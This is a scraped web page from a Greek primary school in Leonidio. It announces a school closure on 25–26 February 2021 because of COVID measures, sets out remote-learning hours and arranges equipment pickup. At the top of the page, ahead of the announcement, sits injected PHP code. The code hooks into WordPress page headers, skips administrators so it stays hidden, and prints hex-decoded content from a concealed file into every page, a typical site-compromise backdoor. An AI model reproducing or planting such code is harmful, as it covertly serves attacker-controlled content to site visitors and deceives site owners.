if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Προσωρινή αναστολή λειτουργίας σχολείου – Έναρξη τηλεκπαίδευσης |

Προσωρινή αναστολή λειτουργίας σχολείου – Έναρξη τηλεκπαίδευσης

Αγαπητοί γονείς και κηδεμόνες,

σας ενημερώνουμε ότι αύριο Πέμπτη 25/2/2021 και μεθαύριο Παρασκευή 26/2/2021 το σχολείο μας (όπως και όλα τα σχολεία του νομού) θα παραμείνει κλειστό στο πλαίσιο των αυξημένων μέτρων για τον περιορισμό της διασποράς του κορωνοϊού στον νομό Αρκαδίας. Ταυτόχρονα τίθεται ξανά σε λειτουργία η εξ αποστάσεως εκπαίδευση μέσω τηλεδιασκέψεων κατά το πρότυπο της προηγούμενης καραντίνας (Νοεμβρίου-Δεκεμβρίου 2020).

Πιο συγκεκριμένα, αύριο Πέμπτη 25/2/2021 και μεθαύριο Παρασκευή 26/2/2021 θα ισχύσει το πρόγραμμα της τηλεκπαίδευσης από τις 14:10 έως τις 17:20. Το πρόγραμμα κάθε τάξης θα σας αποσταλεί εκ νέου από τον/την εκπαιδευτικό αυτής σε περίπτωση που το έχετε χάσει.

Οι μαθητές που έχουν επιστρέψει τον εξοπλισμό (τάμπλετ ή υπολογιστή), μπορούν αύριο το πρωί από τις 9:00 έως τις 12:00 να έρθουν στο σχολείο να τον παραλάβουν.

Την Κυριακή 28/2/2021 θα ακολουθήσει νέα ενημέρωση για τη λειτουργία του σχολείου μας.

Μείνετε ασφαλείς! Καλή δύναμη σε όλους!

Δημοτικό Σχολείο Λεωνιδίου